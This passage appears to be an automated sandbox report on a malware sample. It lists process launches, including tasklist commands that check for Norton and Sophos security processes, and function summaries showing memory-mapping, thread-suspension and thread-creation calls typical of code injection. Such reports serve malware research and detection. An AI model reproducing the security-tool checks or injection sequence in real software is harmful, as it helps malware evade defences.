                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                                                                                                                                                                            Imagebase:0x7ff7b65d0000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:find /I "nswscsvc.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff701940000
                                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff72bec0000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                                                                                                                                            Imagebase:0x7ff7b65d0000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:find /I "sophoshealth.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff701940000
                                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                                                                            Start time:13:05:11
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:846'325'235 bytes
                                                                                                                                                                                                                                                            MD5 hash:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:1.6%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                              Signature Coverage:31.6%
                                                                                                                                                                                                                                                              Total number of Nodes:117
                                                                                                                                                                                                                                                              Total number of Limit Nodes:11
                                                                                                                                                                                                                                                              execution_graph 11761 20203a9 11762 20203b7 11761->11762 11777 2020cf9 11762->11777 11764 2020942 11765 202054f GetPEB 11767 20205cc 11765->11767 11766 202050a 11766->11764 11766->11765 11780 2020ab9 11767->11780 11770 202062d CreateThread 11771 2020605 11770->11771 11792 2020969 GetPEB 11770->11792 11776 202083d 11771->11776 11788 2020fb9 GetPEB 11771->11788 11773 202092d TerminateProcess 11773->11764 11774 2020ab9 4 API calls 11774->11776 11776->11773 11778 2020d06 11777->11778 11790 2020d19 GetPEB 11777->11790 11778->11766 11781 2020acf CreateToolhelp32Snapshot 11780->11781 11783 20205ff 11781->11783 11784 2020b06 Thread32First 11781->11784 11783->11770 11783->11771 11784->11783 11785 2020b2d 11784->11785 11785->11783 11786 2020b64 Wow64SuspendThread 11785->11786 11787 2020b8e CloseHandle 11785->11787 11786->11787 11787->11785 11789 2020687 11788->11789 11789->11774 11789->11776 11791 2020d34 11790->11791 11791->11778 11795 20209c2 11792->11795 11793 2020a22 CreateThread 11793->11795 11796 2021199 11793->11796 11794 2020a6f 11795->11793 11795->11794 11799 206e95e 11796->11799 11800 206e983 11799->11800 11801 206ea6d 11799->11801 11835 20711e0 11800->11835 11811 206fc39 11801->11811 11804 206e99b 11805 20711e0 LoadLibraryA 11804->11805 11810 202119e 11804->11810 11806 206e9dd 11805->11806 11807 20711e0 LoadLibraryA 11806->11807 11808 206e9f9 11807->11808 11809 20711e0 LoadLibraryA 11808->11809 11809->11810 11812 20711e0 LoadLibraryA 11811->11812 11813 206fc5c 11812->11813 11814 20711e0 LoadLibraryA 11813->11814 11815 206fc74 11814->11815 11816 20711e0 LoadLibraryA 11815->11816 11817 206fc92 11816->11817 11818 206fca7 VirtualAlloc 11817->11818 11827 206fcbb 11817->11827 11820 206fcd5 11818->11820 11818->11827 11819 20711e0 LoadLibraryA 11821 206fd53 11819->11821 11820->11819 11832 206ff2e 11820->11832 11823 206fda9 11821->11823 11821->11827 11839 2070fe7 11821->11839 11822 20711e0 LoadLibraryA 11822->11823 11823->11822 11826 206fe0b 11823->11826 11823->11832 11825 206ffec VirtualFree 11825->11827 11826->11832 11834 206fe6d 11826->11834 11867 206edc9 11826->11867 11827->11810 11829 206fe56 11829->11832 11874 206eec4 11829->11874 11832->11825 11833 206ff8b 11832->11833 11833->11833 11834->11832 11843 2070369 11834->11843 11836 20711f7 11835->11836 11837 207121e 11836->11837 11893 206f2e5 11836->11893 11837->11804 11840 2070ffc 11839->11840 11841 2071072 LoadLibraryA 11840->11841 11842 207107c 11840->11842 11841->11842 11842->11821 11844 20703a4 11843->11844 11845 20703eb NtCreateSection 11844->11845 11846 2070410 11844->11846 11866 2070a18 11844->11866 11845->11846 11845->11866 11847 20704a5 NtMapViewOfSection 11846->11847 11846->11866 11848 20704c5 11847->11848 11850 2070fe7 LoadLibraryA 11848->11850 11855 2071085 LoadLibraryA 11848->11855 11856 207074c 11848->11856 11848->11866 11849 20707ee VirtualAlloc 11857 2070830 11849->11857 11850->11848 11851 2070fe7 LoadLibraryA 11851->11856 11852 20708e1 VirtualProtect 11853 20709ac VirtualProtect 11852->11853 11860 2070901 11852->11860 11861 20709db 11853->11861 11854 20707ea 11854->11849 11855->11848 11856->11849 11856->11851 11856->11854 11879 2071085 11856->11879 11857->11852 11863 20708ce NtMapViewOfSection 11857->11863 11857->11866 11858 2070b26 11862 2070b2e CreateThread 11858->11862 11858->11866 11860->11853 11865 2070986 VirtualProtect 11860->11865 11861->11858 11861->11866 11883 2070d9a 11861->11883 11862->11866 11863->11852 11863->11866 11865->11860 11866->11832 11868 2070fe7 LoadLibraryA 11867->11868 11869 206eddd 11868->11869 11870 2071085 LoadLibraryA 11869->11870 11873 206ede5 11869->11873 11871 206edfd 11870->11871 11872 2071085 LoadLibraryA 11871->11872 11871->11873 11872->11873 11873->11829 11875 2070fe7 LoadLibraryA 11874->11875 11876 206eeda 11875->11876 11877 2071085 LoadLibraryA 11876->11877 11878 206eeea 11877->11878 11878->11834 11880 20711b6 11879->11880 11881 20710a0 11879->11881 11880->11856 11881->11880 11887 206f48a 11881->11887 11886 2070dc2 11883->11886 11884 2070fb4 11884->11858 11885 2071085 LoadLibraryA 11885->11886 11886->11884 11886->11885 11889 206f4a9 11887->11889 11892 206f4cf 11887->11892 11888 2070fe7 LoadLibraryA 11890 206f4dc 11888->11890 11889->11890 11891 2071085 LoadLibraryA 11889->11891 11889->11892 11890->11880 11891->11889 11892->11888 11892->11890 11894 206f3ea 11893->11894 11895 206f305 11893->11895 11894->11836 11895->11894 11896 206f48a LoadLibraryA 11895->11896 11896->11894

                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                              Function 02070369 Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 02070402
                                                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,00000000), ref: 020704AA
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0207081E
                                                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 020708D3
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 020708F0
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 02070993
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 020709C6
                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 02070B37
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1248616170-0
                                                                                                                                                                                                                                                              • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                                                                                                              • Instruction ID: 1d20b54adf63eb44ca4c34f465efe1526e6678b8638cbccaf3303ace3f2efc59
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F428C71A08301AFD765CF24C844B6BB7EAEF88718F044A2DF9899B241E770E944DB95
                                                                                                                                                                                                                                                              Function 02020AB9 Relevance: 6.1, APIs: 4, Instructions: 100threadprocessCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 187 2020ab9-2020b00 CreateToolhelp32Snapshot 190 2020bd6-2020bd9 187->190 191 2020b06-2020b27 Thread32First 187->191 192 2020bc2-2020bd1 191->192 193 2020b2d-2020b33 191->193 192->190 194 2020ba2-2020bbc 193->194 195 2020b35-2020b3b 193->195 194->192 194->193 195->194 196 2020b3d-2020b5c 195->196 196->194 199 2020b5e-2020b62 196->199 200 2020b64-2020b78 Wow64SuspendThread 199->200 201 2020b7a-2020b89 199->201 202 2020b8e-2020ba0 CloseHandle 200->202 201->202 202->194
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,020205FF,?,00000001,?,81EC8B55,000000FF), ref: 02020AF7
                                                                                                                                                                                                                                                              • Thread32First.KERNEL32(00000000,0000001C), ref: 02020B23
                                                                                                                                                                                                                                                              • Wow64SuspendThread.KERNEL32(00000000), ref: 02020B76
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02020BA0
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1849706056-0
                                                                                                                                                                                                                                                              • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                                                                                              • Instruction ID: ae4046f9bf82bb1754c0b628e4b808a58a3671e112f936740a51525cf41ecf25
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F411C71B00218AFDB19DF98C890BADB7F6EF88304F10C069E6159B7A4DB34AE45CB54
                                                                                                                                                                                                                                                              Function 02020969 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 203 2020969-20209c0 GetPEB 204 20209cb-20209cf 203->204 205 20209d5-20209e0 204->205 206 2020a6f-2020a76 204->206 207 20209e6-20209fd 205->207 208 2020a6a 205->208 209 2020a81-2020a85 206->209 212 2020a22-2020a3a CreateThread 207->212 213 20209ff-2020a20 207->213 208->204 210 2020a96-2020a9d 209->210 211 2020a87-2020a94 209->211 216 2020aa6-2020aab 210->216 217 2020a9f-2020aa1 210->217 211->209 218 2020a3e-2020a46 212->218 213->218 217->216 218->208 220 2020a48-2020a65 218->220 220->208
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02020A35
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateThread
                                                                                                                                                                                                                                                              • String ID: ,
                                                                                                                                                                                                                                                              • API String ID: 2422867632-3772416878
                                                                                                                                                                                                                                                              • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                                                                                              • Instruction ID: d366e3d89a3afb94df81183069134951292917b7dc5c1295edd82a2bcf520fb7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D141C374A00209EFDB04CF98C994BAEB7B2FF98314F208199D5156B390C771AE85DF94
                                                                                                                                                                                                                                                              Function 020203A9 Relevance: 3.4, APIs: 2, Instructions: 399threadCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 239 20203a9-2020511 call 2020959 call 2020f59 call 2021109 call 2020cf9 248 2020942-2020945 239->248 249 2020517-202051e 239->249 250 2020529-202052d 249->250 251 202054f-20205ca GetPEB 250->251 252 202052f-202054d call 2020e79 250->252 254 20205d5-20205d9 251->254 252->250 255 20205f1-2020603 call 2020ab9 254->255 256 20205db-20205ef 254->256 262 2020605-202062b 255->262 263 202062d-202064e CreateThread 255->263 256->254 264 2020651-2020655 262->264 263->264 266 2020916-2020940 TerminateProcess 264->266 267 202065b-202068e call 2020fb9 264->267 266->248 267->266 271 2020694-20206e3 267->271 273 20206ee-20206f4 271->273 274 20206f6-20206fc 273->274 275 202073c-2020740 273->275 276 20206fe-202070d 274->276 277 202070f-2020713 274->277 278 2020746-2020753 275->278 279 202080e-2020901 call 2020ab9 call 2020959 call 2020f59 275->279 276->277 280 2020715-2020723 277->280 281 202073a 277->281 282 202075e-2020764 278->282 305 2020903 279->305 306 2020906-2020910 279->306 280->281 283 2020725-2020737 280->283 281->273 286 2020766-2020774 282->286 287 2020794-2020797 282->287 283->281 290 2020792 286->290 291 2020776-2020785 286->291 288 202079a-20207a1 287->288 288->279 293 20207a3-20207ac 288->293 290->282 291->290 295 2020787-2020790 291->295 293->279 296 20207ae-20207be 293->296 295->287 298 20207c9-20207d5 296->298 300 2020806-202080c 298->300 301 20207d7-2020804 298->301 300->288 301->298 305->306 306->266
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 0202064C
                                                                                                                                                                                                                                                              • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02020940
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateProcessTerminateThread
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1197810419-0
                                                                                                                                                                                                                                                              • Opcode ID: 68cb2f7865c6344c0eb42f166750cb2d3eabdbe292026f519db6a63cbfcf1d03
                                                                                                                                                                                                                                                              • Instruction ID: 6fc43466d5e6c0267288d401dea1c5b3db8f61de5e004a90682dc32b2c814bb4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68cb2f7865c6344c0eb42f166750cb2d3eabdbe292026f519db6a63cbfcf1d03
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA12C2B4E00219DFDB14CF98C990BADBBB2FF88304F2481AAD515AB385D734AA45DF54
                                                                                                                                                                                                                                                              Function 02070FE7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 222 2070fe7-2070ffa 223 2071012-207101c 222->223 224 2070ffc-2070fff 222->224 226 207101e-2071026 223->226 227 207102b-2071037 223->227 225 2071001-2071004 224->225 225->223 228 2071006-2071010 225->228 226->227 229 207103a-207103f 227->229 228->223 228->225 230 2071072-2071079 LoadLibraryA 229->230 231 2071041-207104c 229->231 234 207107c-2071080 230->234 232 207104e-2071066 call 20716b5 231->232 233 2071068-207106c 231->233 232->233 238 2071081-2071083 232->238 233->229 236 207106e-2071070 233->236 236->230 236->234 238->234
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,?,?), ref: 02071079
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                                                                              • String ID: .dll
                                                                                                                                                                                                                                                              • API String ID: 1029625771-2738580789
                                                                                                                                                                                                                                                              • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                                                              • Instruction ID: df39e2e7138cc2d9cb4d323a35306dae75e612ea02f0f838c1ad1047f016b135
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A210535A003C59FDB62CF68C444B69BBE4AF05324F18406CD809A7681D7B0E845A7C4
                                                                                                                                                                                                                                                              Function 0206FC39 Relevance: 2.8, APIs: 2, Instructions: 325memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 307 206fc39-206fc9d call 20711e0 * 3 314 206fcc7 307->314 315 206fc9f-206fca1 307->315 316 206fcca-206fcd4 314->316 315->314 317 206fca3-206fca5 315->317 317->314 318 206fca7-206fcb9 VirtualAlloc 317->318 319 206fcd5-206fcf8 call 2071655 call 2071679 318->319 320 206fcbb-206fcc2 318->320 326 206fd42-206fd5b call 20711e0 319->326 327 206fcfa-206fd30 call 207134d call 2071223 319->327 320->314 321 206fcc4 320->321 321->314 326->314 332 206fd61 326->332 338 206fd36-206fd3c 327->338 339 206ff91-206ff9a 327->339 334 206fd67-206fd6d 332->334 336 206fd6f-206fd75 334->336 337 206fda9-206fdb2 334->337 340 206fd77-206fd7a 336->340 341 206fdb4-206fdba 337->341 342 206fe0b-206fe16 337->342 338->326 338->339 343 206ffa1-206ffa9 339->343 344 206ff9c-206ff9f 339->344 349 206fd8e-206fd90 340->349 350 206fd7c-206fd81 340->350 351 206fdbe-206fdd9 call 20711e0 341->351 347 206fe2f-206fe32 342->347 348 206fe18-206fe21 call 206ef2d 342->348 345 206ffab-206ffd6 call 2071679 343->345 346 206ffd8 343->346 344->343 344->346 353 206ffdc-206fffc call 2071679 VirtualFree 345->353 346->353 357 206ff8d 347->357 358 206fe38-206fe41 347->358 348->357 370 206fe27-206fe2d 348->370 349->337 356 206fd92-206fda0 call 2070fe7 349->356 350->349 355 206fd83-206fd8c 350->355 367 206fddb-206fde3 351->367 368 206fdf8-206fe09 351->368 378 2070002-2070004 353->378 379 206fffe 353->379 355->340 355->349 371 206fda5-206fda7 356->371 357->339 365 206fe47-206fe4e 358->365 366 206fe43 358->366 372 206fe50-206fe59 call 206edc9 365->372 373 206fe7e-206fe82 365->373 366->365 367->357 374 206fde9-206fdf2 367->374 368->342 368->351 370->365 371->334 384 206fe67-206fe70 call 206eec4 372->384 385 206fe5b-206fe61 372->385 376 206ff24-206ff27 373->376 377 206fe88-206feaa 373->377 374->357 374->368 381 206ff79-206ff7b call 2070369 376->381 382 206ff29-206ff2c 376->382 377->357 393 206feb0-206fec3 call 2071655 377->393 378->316 379->378 392 206ff80-206ff81 381->392 382->381 386 206ff2e-206ff31 382->386 384->373 400 206fe72-206fe78 384->400 385->357 385->384 390 206ff33-206ff35 386->390 391 206ff4a-206ff5b call 206fa2a 386->391 390->391 395 206ff37-206ff3a 390->395 405 206ff6c-206ff77 call 206f4f6 391->405 406 206ff5d-206ff69 call 2070009 391->406 396 206ff82-206ff89 392->396 408 206fee7-206ff20 393->408 409 206fec5-206fec9 393->409 401 206ff41-206ff48 call 2070bd7 395->401 402 206ff3c-206ff3f 395->402 396->357 403 206ff8b 396->403 400->357 400->373 401->392 402->396 402->401 403->403 405->392 406->405 408->357 418 206ff22 408->418 409->408 413 206fecb-206fece 409->413 413->376 417 206fed0-206fee5 call 2071458 413->417 417->418 418->376
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0206FCB3
                                                                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 0206FFF7
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2087232378-0
                                                                                                                                                                                                                                                              • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                                                                                                                              • Instruction ID: 787d707ec3e6efbaca2edccecfe1388e4bdbda8fa95a5c676f376eb417ab008c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93B1C231500702AFDB629FA0EC8CBBBF7EAFF0A354F140519E95A86940E731E550EB91

                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                              Function 02033EC6 Relevance: 109.8, Strings: 86, Instructions: 2297COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
